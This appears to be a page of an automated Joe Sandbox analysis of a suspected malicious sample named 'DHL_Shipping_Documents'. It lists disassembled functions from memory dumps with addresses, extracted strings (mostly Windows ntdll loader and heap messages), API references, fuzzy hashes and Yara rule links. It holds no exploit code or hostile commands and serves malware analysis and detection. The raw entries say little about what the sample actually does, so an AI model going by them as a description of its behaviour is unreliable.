Uniqueness Score: -1.00%

Function 00416CCF Relevance: 7.6, Strings: 6, Instructions: 103COMMON

Download Yara Rule

Strings

Host: , xrefs: 00416DBA, 00416DD2, 00416DC0
, xrefs: 00416DAB, 00416DAE
Unknown, xrefs: 00416D45, 00416D48
: , xrefs: 00416D89
: , xrefs: 00416DBD, 00416DC1
Host, xrefs: 00416D82

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID:
String ID: $: $: $Host$Host: $Unknown
API String ID: 0-3527920956
Opcode ID: 0ce064bc143dbd63f3c15f69614a23402998c07c98b34d86d72517c7f355e740
Instruction ID: 26944dce2a87892defd4774f10fea705612061c58efe6a7547ee9a2d83877787
Opcode Fuzzy Hash: 0ce064bc143dbd63f3c15f69614a23402998c07c98b34d86d72517c7f355e740
Instruction Fuzzy Hash: AB310372A04245ABDB11CF94DC81FEAB778EF85304F0846ABE918DB246C734A644C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 0151092E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01512DB0: LdrInitializeThunk.NTDLL ref: 01512DBA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510B63
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510B76
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510D20
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510D34

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 38a36d9ab5597fdbb4b96ef9f8388c7baf3af12e6e9e88d4bc746bd11d00abc8
Instruction ID: efcf0f1793bd090e54a6ba05260dd0c87c8af89a4624e6fb127c8feaa9872083
Opcode Fuzzy Hash: 38a36d9ab5597fdbb4b96ef9f8388c7baf3af12e6e9e88d4bc746bd11d00abc8
Instruction Fuzzy Hash: 2F426D75900715DFEB22CF28C881BAAB7F5BF48314F1445A9E989DF245E770AA84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0155CB70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0155CC8D

Strings

@, xrefs: 0155CBDA
@4Ew@4Ew, xrefs: 0155CCA5, 0155CCAA, 0155CCC1

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Ew@4Ew
API String ID: 4062629308-954339963
Opcode ID: aa9cd57f454fec2229c35eeeda0b933fe9ea9f7c454d9cc954da37ec74ad6633
Instruction ID: 175e5c1350ef52115e821ffc207240c0017e02cbf2a8a527eda3a58b05730a9a
Opcode Fuzzy Hash: aa9cd57f454fec2229c35eeeda0b933fe9ea9f7c454d9cc954da37ec74ad6633
Instruction Fuzzy Hash: D2418C7590025A9EDB619FE9C854AADBBF8FF64B00F00842FE912DF264E7748800CB61

Uniqueness

Uniqueness Score: -1.00%

Function 014DA320 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 014DA35F
8, xrefs: 014DA347
6, xrefs: 014DA357
LdrResFallbackLangList Enter, xrefs: 014DA34F

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 0485a01fa19455f61965ffe55fd081c1d26c6984ce50aa10696aff9c38c9e6a8
Instruction ID: f1e9056547b1a2e25e75b37d1c33c4f37f133fa4eb24469e795d63e26f62aaac
Opcode Fuzzy Hash: 0485a01fa19455f61965ffe55fd081c1d26c6984ce50aa10696aff9c38c9e6a8
Instruction Fuzzy Hash: F1C1A970108382CFDB11CF68C064B6AB7E5BF84704F14886EF9868B361E774C94ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 015083C2 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 015083E1
minkernel\ntdll\ldrinit.c, xrefs: 015083E2
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0150851E
@, xrefs: 01508551

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 27e27ef4788008796ca842fd2e9b85022dee1516cb17c1cd4f9ace7c00aa62d0
Instruction ID: 9b53cfd43c0705133dd3510fb9bf39ba4177d6900ca1a15d951657b853104ae2
Opcode Fuzzy Hash: 27e27ef4788008796ca842fd2e9b85022dee1516cb17c1cd4f9ace7c00aa62d0
Instruction Fuzzy Hash: 5F918071918345AFE722DF65C841FAFBBE8BF98744F40092EF6849A191E331D944CB62

Uniqueness

Uniqueness Score: -1.00%

Function 014E0B50 Relevance: 5.3, Strings: 4, Instructions: 260COMMON

Download Yara Rule

Strings

((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 01535452
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01535513
HEAP[%wZ]: , xrefs: 01535436, 015354F7
HEAP: , xrefs: 01535445, 01535506

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 1b8a370851784d70286b6f5302eb876d29bc3a826cd6570ed4c648fdfaf35eb0
Instruction ID: d849facbf0fc9cd87dce254f7b69ed4e12f56edf0fbc0099344ddbb636dfa64f
Opcode Fuzzy Hash: 1b8a370851784d70286b6f5302eb876d29bc3a826cd6570ed4c648fdfaf35eb0
Instruction Fuzzy Hash: 22A1F130B003069FDB29CF68C444BBABBE1FF54701F14856EE4A68B362D7B5A945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 015026EC Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 0154219C
.Local, xrefs: 01502888
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015420BF, 01542197
SXS: %s() passed the empty activation context, xrefs: 015420C4

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 7a58ce03fc6ae712e9b5c131fb374709bfe813d845897b100d6d49699aef529b
Instruction ID: 35a40ba7f582bb52bc7821d5918032576bbd3e19de091f94be83b186534a92e9
Opcode Fuzzy Hash: 7a58ce03fc6ae712e9b5c131fb374709bfe813d845897b100d6d49699aef529b
Instruction Fuzzy Hash: 49A1B53590022ADFDB25CF98DC88B99B7B5BF58314F1545EAE908AB291D7309EC1CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01504A80 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 0154330B, 01543318, 01543337
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 0154331D
SXS: %s() called with invalid flags 0x%08lx, xrefs: 01543310
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 0154333C

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 711f33dde91b7598cb45c5a841c4164dc7eb2d131eba60d37a89d284912597c3
Instruction ID: 19c394df36d8ed39c310acf04ee4a960515123d07f656642723e81ca44b2deb6
Opcode Fuzzy Hash: 711f33dde91b7598cb45c5a841c4164dc7eb2d131eba60d37a89d284912597c3
Instruction Fuzzy Hash: 3A610132600A129FDB22CF59C881B6EB7E5FF80A54F14891DE9559F3A1CB70E801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014D640B Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 0153100D
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01530F87
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01530F44
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01530FCA

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: a38977b33ec6b283a9bca73aa2b8456652b4bc0ff254ccc70faaa7c1deb6c81a
Instruction ID: d3c9680481d4efab049415c98d5e3d6c9a06a6c0905d94e8b8a2d2f4930b60bc
Opcode Fuzzy Hash: a38977b33ec6b283a9bca73aa2b8456652b4bc0ff254ccc70faaa7c1deb6c81a
Instruction Fuzzy Hash: F371F0B1904306AFCB21DF14C884F9B7BA8BF957A4F41042AF9488B296D734D589CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 014F23AA Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 0153A8FE
apphelp.dll, xrefs: 014F23B2
minkernel\ntdll\ldrinit.c, xrefs: 0153A908
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0153A8F8

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 4fd02400ba32039ae34b994e8f4501170c12b7f2df19bf37739474a47d971668
Instruction ID: 197fcceefd27387abffd9ddc57b800b08fff8fbd9cae23406d4f1f714928b8d0
Opcode Fuzzy Hash: 4fd02400ba32039ae34b994e8f4501170c12b7f2df19bf37739474a47d971668
Instruction Fuzzy Hash: 5E315576A00205AFDB319F69D881EAEBBF4FBC0B10F16400EE940AF365D7B09946C750

Uniqueness

Uniqueness Score: -1.00%

Function 014E28F0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 014E31CD
HEAP[%wZ]: , xrefs: 014E31A5
HEAP: , xrefs: 014E31B4

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 1c8810caf7ecc16aa862991df275217b5ef1db99b1aac37776f25dc3cae9d244
Instruction ID: 772bfc5b70516f1b5700cb07aea008f19f46cb7e6cd22a4e4aa0b6b848070c99
Opcode Fuzzy Hash: 1c8810caf7ecc16aa862991df275217b5ef1db99b1aac37776f25dc3cae9d244
Instruction Fuzzy Hash: 3692DE709042499FDB26CF68C448BAEBBF5FF48301F14849EE859AB3A1D775A942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 014E06C0 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01535013
HEAP: , xrefs: 01535022
(UCRBlock->Size >= *Size), xrefs: 0153502F

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: d6d1a2328e9fa3cfea08385917d4fd30f9795495b4693f1f4c3780632e00dc79
Instruction ID: 544a9ccff320d9cf0b42a77f2c8659bbb471a9a3c93cc811327c5e62e8aff426
Opcode Fuzzy Hash: d6d1a2328e9fa3cfea08385917d4fd30f9795495b4693f1f4c3780632e00dc79
Instruction Fuzzy Hash: 99F1BE70B00606DFEB25CF68C898B6AB7F5FF84300F14416AE5669B3A1D774E981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 014F68C2 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 0153C9B4
@, xrefs: 014F6B84

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: 6445d921ea6139b3800429a6da85326304fee4ef35b01d717db633e0d9177e78
Instruction ID: 97d34d389325a59a0e7ce31b0ade729acb08c71efa54455d89c468d460bbdd61
Opcode Fuzzy Hash: 6445d921ea6139b3800429a6da85326304fee4ef35b01d717db633e0d9177e78
Instruction Fuzzy Hash: C4C28E716083419FE725CF29C881BABBBE5BFC8714F05892EEA8997361D734D805CB52

Uniqueness

Uniqueness Score: -1.00%

Function 014CA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 014CA171
FilterFullPath, xrefs: 0152C245
\??\, xrefs: 0152C143

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 4f5bb6c3926d510d729c2738a33e4d39d7eb566dc36e837767d939005e762fd1
Instruction ID: 10d5cb0ddd12abf24e2aeed3018977d87cad51adbd4d3f26b3d577ec8eafb6ac
Opcode Fuzzy Hash: 4f5bb6c3926d510d729c2738a33e4d39d7eb566dc36e837767d939005e762fd1
Instruction Fuzzy Hash: 7CA17F729016299BDB32DF68CC88B9EB7B8FF55700F1005EAD908AB251DB349E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 014F0B1B Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 0153A075
minkernel\ntdll\ldrinit.c, xrefs: 0153A087
LdrpCheckModule, xrefs: 0153A07D

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 5596c9b8e5d8ddbca09f9417defe33b839032a754054abe78d65ee5d99f9feff
Instruction ID: 146ae15852fea467438ae256a26a0d1ee1989952bf00ea421a48ee3adda0d6dc
Opcode Fuzzy Hash: 5596c9b8e5d8ddbca09f9417defe33b839032a754054abe78d65ee5d99f9feff
Instruction Fuzzy Hash: DF710571A0020A9FDB25DFA8C855BBEB7F1FB84604F15406EE552DB362E734AA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014E09AB Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 015352B2
HEAP[%wZ]: , xrefs: 0153529A
HEAP: , xrefs: 015352A7

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 5a9e1dffbb4f0bc818380de61b1ccd3d8b4ec32816b1d586cced7c29ef486aa2
Instruction ID: 0df33f903dc3d8947a69e28f7a93ca9832a6e701988560ac1be69d19e1d5afc0
Opcode Fuzzy Hash: 5a9e1dffbb4f0bc818380de61b1ccd3d8b4ec32816b1d586cced7c29ef486aa2
Instruction Fuzzy Hash: 59618D717103469FDB29CF28C444BAABBE1FF54705F14855AF4A68F2A2D7B0E882CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0150C6E0 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 015481BD
LdrpInitializePerUserWindowsDirectory, xrefs: 015481C4
minkernel\ntdll\ldrinit.c, xrefs: 015481CE

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 6d36e8803e30a91148fc410287fa44eba1cb665807d5a67c8a4f79b3f0912421
Instruction ID: 536b416a9d87f4cbcb50cbbf7fe342b596a4fa0073857bfebe23b3f998c2928d
Opcode Fuzzy Hash: 6d36e8803e30a91148fc410287fa44eba1cb665807d5a67c8a4f79b3f0912421
Instruction Fuzzy Hash: 8241FD71500701AFC722EFA9D844B5B77E8BB94A54F014A2FB9599B2A0EB70E804CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01554415 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01554559
LdrpCheckRedirection, xrefs: 0155454F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01554548

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: b254b3c98f600e385962f1d502cd84df110d58acb2eb876698c2e3326bb19225
Instruction ID: 02cbedc26f984768c7b2649cc549c584b0b2c03f86c9790ddedc7475aa6712c3
Opcode Fuzzy Hash: b254b3c98f600e385962f1d502cd84df110d58acb2eb876698c2e3326bb19225
Instruction Fuzzy Hash: 9E41C332604611DFCBA1CE5CD860A2A7BE4BF88654F06095BED999F751F730E880DB91

Uniqueness

Uniqueness Score: -1.00%

Function 014E0B0E Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 015353AE
HEAP[%wZ]: , xrefs: 01535396
HEAP: , xrefs: 015353A3

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 27d26eda7a5a781038c19faf7ad3f4cf101117fc102f467e956dd5218d28ef0f
Instruction ID: 88d1037bb10c8551e51e1fb49fae9608838dea741d42ec8cdbeda4d47a414179
Opcode Fuzzy Hash: 27d26eda7a5a781038c19faf7ad3f4cf101117fc102f467e956dd5218d28ef0f
Instruction Fuzzy Hash: 2A11CD323251028FDB298E198488B7AB3E4FF90A25F29442FF416CF261E7B0D841CB41

Uniqueness

Uniqueness Score: -1.00%

Function 014E0339 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01534CEF

Strings

#%u, xrefs: 01534CE7

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: eeb1c73b63508a29ca30d7df6244d38bceba5acb40a6edef30b9c6885f6ab16f
Instruction ID: ae819750887f92cca4aac4a948a7b0ff6358ae89a6a09b3821398e8ac579ad24
Opcode Fuzzy Hash: eeb1c73b63508a29ca30d7df6244d38bceba5acb40a6edef30b9c6885f6ab16f
Instruction Fuzzy Hash: A9715D71A0014A9FDB02DFA9C994FAEB7F8FF58704F144066E901EB251EB74E941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 014DA930 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 014DA985
LdrResSearchResource Enter, xrefs: 014DA973

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 83779a32559b5395de9c9819909d33b5384257f612439278504cf5da232c47fd
Instruction ID: b519759243aea768a069a6ee44fa15311a2faab4338e57b599ffb0f96a03d1f2
Opcode Fuzzy Hash: 83779a32559b5395de9c9819909d33b5384257f612439278504cf5da232c47fd
Instruction Fuzzy Hash: E8E19F71E006099FEF22CE99C990BAEBBB9BF84310F24452BE911EB361D7749941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0159A012 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0159A10B
`, xrefs: 0159A211

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 4039684f2bd112405ba1fb1b0da043d8514fefdd62c59bf58927ccce99228a94
Instruction ID: 5ca81a80253b8f79859cc9b55177e8be9bc4a01dcdfe6fcb01b97bdb8ca6cbfb
Opcode Fuzzy Hash: 4039684f2bd112405ba1fb1b0da043d8514fefdd62c59bf58927ccce99228a94
Instruction Fuzzy Hash: 97C1DD312043469BEB24CF29C841B6BBBE5FFD4318F184A2DF6958B290D7B5D505CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0154E3B2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0154E411
Legacy, xrefs: 0154E41A

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: ba22a7dc2894919f2a402ce0193c1d01196a9aa93e22c1f70069ccd9a4888526
Instruction ID: 011200e143fa5dfc29af6c2e60c04cd5e61f8d685cd55f83c41e0fb9c0c60358
Opcode Fuzzy Hash: ba22a7dc2894919f2a402ce0193c1d01196a9aa93e22c1f70069ccd9a4888526
Instruction Fuzzy Hash: C4616BB1A002099FDB25DFA9C841BAEBBF5FB48744F14442EE649EF251E735E901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 014DABB0 Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

LdrpResGetMappingSize Enter, xrefs: 014DABCA
LdrpResGetMappingSize Exit, xrefs: 014DABDC

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
API String ID: 0-1497657909
Opcode ID: 1ad712b6e473e17a0c5f8a8a361eaa9292868a2f1bc3eb5f50fac887c45c8220
Instruction ID: 558f477cc9030ef4d4d7f7c6310bdcec592486385de32b3afad8b2e1cc65c168
Opcode Fuzzy Hash: 1ad712b6e473e17a0c5f8a8a361eaa9292868a2f1bc3eb5f50fac887c45c8220
Instruction Fuzzy Hash: 6961F271A006459FEF12CFA9C860BAEBBB4BF54750F24042BE901EB3A0D374D941C720

Uniqueness

Uniqueness Score: -1.00%

Function 015740A4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 01574107
MUI, xrefs: 015741F5

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 7032128390b60fba7bea14c56360d6c92725c22e281cbe74b54a31dfc6b9e621
Instruction ID: 3be71109c93ef7c8dc415af4be61b93d7cb509a8819514ccb495bc3e0becb094
Opcode Fuzzy Hash: 7032128390b60fba7bea14c56360d6c92725c22e281cbe74b54a31dfc6b9e621
Instruction Fuzzy Hash: 615109B1E0020EAEEF11DFA9DC91AEEBBB9FB54754F10052AE611AB250D7349905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 014D0485 Relevance: 2.6, Strings: 2, Instructions: 133COMMON

Download Yara Rule

Strings

kLsE, xrefs: 014D04E0
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014D05E3

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
